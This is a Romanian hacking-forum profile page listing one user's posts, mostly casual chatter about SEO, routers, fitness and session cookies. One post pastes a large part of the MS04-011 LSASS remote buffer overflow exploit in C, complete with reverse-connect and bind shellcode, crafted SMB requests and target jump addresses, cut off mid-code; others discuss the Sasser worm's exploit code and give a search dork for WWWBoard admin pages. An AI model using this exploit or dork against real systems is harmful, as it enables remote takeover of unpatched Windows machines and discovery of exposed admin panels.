Jump to content

axxl2006

Active Members
  • Posts

    50
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

axxl2006's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Trebuie sa obtii cat mai multe "voturi", asta insemnand sa ai link pe un site cu PR mai mare. Daca nu ai bani de reclama incearca un link exchange Acu "hackati" si voi ebay.com si puneti link-ul acolo :@
  2. <div class='quotetop'>QUOTE("Thunder")</div> :@ ..acum scuza-ma...din cate stiam administratorul face legea :@
  3. <div class='quotetop'>QUOTE("Thunder")</div> Sigur, nici nu o sa-si dea seama administratorul ca cineva are server de CS pe router-ul lui :?
  4. Bruneta cu ochii verzi ?
  5. Eu nu fac burta nici sa ma bati :@ dar am si un stil de viata sportiv. De burta e cel mai greu sa scapi. Nu va incredeti in creme, diete si prostii. Sala este singura cale, multa munca si rabdare
  6. <div class='quotetop'>QUOTE("icerw")</div> I se mai spune si Linux Backdoor...
  7. Trick-ul e vechi si merge doar daca esti Administrator. Poti sa treci din Administrator in SYSTEM.
  8. este doar o parte din codul sursa a worm-ului Sasser. Dupa cum va puteti da seama este doar partea prin care exploateaza vulnerabilitatea lsass. lipsesc codurile sursa pt serverul ftp, instalarea lui si cheile din registry, copierea lui pe pc-ul victimei, generarea unui ip random si exploatarea lui...si altele, depinde de versiune.
  9. pai asta ziceam si eu la baieti. Dar daca dai log-out, sesiunea expira si automat cookie-ul nu mei e valabil
  10. Din pacate vad ca nu mai functioneaza. Acu ceva timp mergea. Rog un moderator sa mute topicul in tomberon
  11. #include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/types.h> #include <arpa/inet.h> // reverse shellcode unsigned char reverseshell[] = "xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA" "xEBx05xE8xEBxFFxFFxFF" "x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12" "xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99" "x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12" "x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99" "x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9" "xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D" "x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA" "xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32" "x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10" "xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8" "xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66" "xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5" "x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8" "x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A" "x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12" "x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A" "x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C" "x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33" "xF9x7ExE0x5FxE0"; // bind shellcode unsigned char bindshell[] = "xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA" "xEBx05xE8xEBxFFxFFxFF" "x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12" "xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A" "x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6" "x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D" "xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A" "x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58" "x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0" "x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41" "xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B" "x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D" "xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA" "x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10" "x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF" "xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8" "xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79" "xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C" "x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59" "x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD" "xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC" "xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5" "xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6" "xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0" "xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED" "x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99"; char req1[] = "x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F" "x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02" "x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F" "x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70" "x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30" "x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54" "x20x4Cx4Dx20x30x2Ex31x32x00"; char req2[] = "x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00" "x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E" "x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00" "x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00" "x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00" "x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00" "x2Ex00x30x00x00x00x00x00"; char req3[] = "x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00" "x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E" "x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46" "x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40" "x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40" "x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48" "x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF" "x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00" "x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00" "x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00" "x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00" "x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00"; char req4[] = "x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE" "x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00" "x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00" "x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00" "x49x00x50x00x43x00x24" "x00x00x00x3Fx3Fx3Fx3Fx3Fx00"; char req5[] = "x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00" "x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00" "x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00" "x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00" "x72x00x70x00x63x00x00x00"; char req6[] = "x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02" "x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00" "x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00" "x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11" "x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A" "xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00"; char req7[] = "x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04" "x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02" "x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00" "xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00" "xECx03x00x00x00x00x00x00xECx03x00x00"; // room for shellcode here ... char shit1[] = "x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9"; char req8[] = "x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE" "x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF" "xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00" "x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00" "x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00" "x00x00x00x00xADx0Dx00x00"; // room for shellcode here ... char req9[] = "x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8" "x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01" "x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00" "x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02" "x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00" "x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00" "x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00"; char shit3[] = "x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00" "x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00" "x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00" "x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00" "x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00" "x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"; #define LEN 3500 #define BUFSIZE 2000 #define NOP 0x90 struct targets { int num; char name[50]; long jmpaddr; } ttarget[]= { { 0, "WinXP Professional   [universal] lsass.exe ", 0x01004600 }, // jmp esp addr { 1, "Win2k Professional   [universal] netrap.dll", 0x7515123c }, // jmp ebx addr { 2, "Win2k Advanced Server [sP4]    netrap.dll", 0x751c123c }, // jmp ebx addr }; void usage(char *prog) { int i; printf("Usage:nn"); printf("%s <target> <victim IP> <bindport> [connectback IP] [options]nn", prog); printf("Targets:n"); for (i=0; i<3; i++) printf(" %d [0x%.8x]: %sn", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name); printf("nOptions:n"); printf(" -t: Detect remote OS:n"); printf(" Windows 5.1 - WinXPn"); printf(" Windows 5.0 - Win2knn"); exit(0); } int main(int argc, char *argv[]) { int i; int opt = 0; char *target; char hostipc[40]; char hostipc2[40*2]; unsigned short port; unsigned long ip; unsigned char *sc; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(req4)+20]; char screq[bUFSIZE+sizeof(req7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="x66x81xECx1Cx07xFFxE4"; char strBuffer[bUFSIZE]; unsigned int targetnum = 0; int len, sockfd; short dport = 445; struct hostent *he; struct sockaddr_in their_addr; char smblen; char unclen; printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n"); printf("--- Coded by .::[ houseofdabus ]::. ---nn"); if (argc < 4) { usage(argv[0]); } target = argv[2]; sprintf((char *)hostipc,"%sipc$", target); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, req4, sizeof(req4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); if (argc > 4) if (!memcmp(argv[4], "-t", 2)) opt = 1; if ( (argc > 4) && !opt ) { port = htons(atoi(argv[3]))^(unsigned short int)0x9999; ip = inet_addr(argv[4])^(unsigned long int)0x99999999; memcpy(&reverseshell[118], &port, 2); memcpy(&reverseshell[111], &ip, 4); sc = reverseshell; } else { port = htons(atoi(argv[3]))^(unsigned short int)0x9999; memcpy(&bindshell[176], &port, 2); sc = bindshell; } if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "x3cx12x15x75", 4); memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4); memcpy(&buf[2036], sc, strlen(sc)); memcpy(&buf[2840], "xebx06xebx06", 4); memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr memcpy(&buf[2856], sc, strlen(sc)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, sc, strlen(sc)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttarget[atoi(argv[1])].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500); if ((he=gethostbyname(argv[2])) == NULL) { // get the host info perror("[-] gethostbyname "); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(dport); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '
  12. intitle:"WWWAdmin For WWWBoard"
  13. ip de retea, dar nu va lua ip-ul public al altcuiva
  14. Nu cred ca mai exista vre-un isp unde sa mai mearga asa ceva... Poate la din-alea mici de cartier, unde adminu e un pustan de 16 ani
  15. As originally urged by the FBI, and still urged by prominent security experts, our UnPnP utility easily disables the dangerous, and almost always unnecessary, Universal Plug and Play service. If you don't need it, turn it off. (For ALL versions of Windows.) The Universal Plug and Play service (UPnP), which is installed and running in all versions of Windows XP — and may be loaded into Windows 98 and ME — essentially turns every one of those systems into a wide-open Internet server. This server listens for TCP connections on port 5000 and for UDP 'datagram' packets arriving on port 1900. This allows malicious hackers (or high-speed Internet worms) located anywhere in the world to scan for, and locate, individual Windows UPnP-equipped machines. Any vulnerabilities — known today or discovered tomorrow — can then be rapidly exploited. http://www.grc.com/files/unpnp.exe
×
×
  • Create New...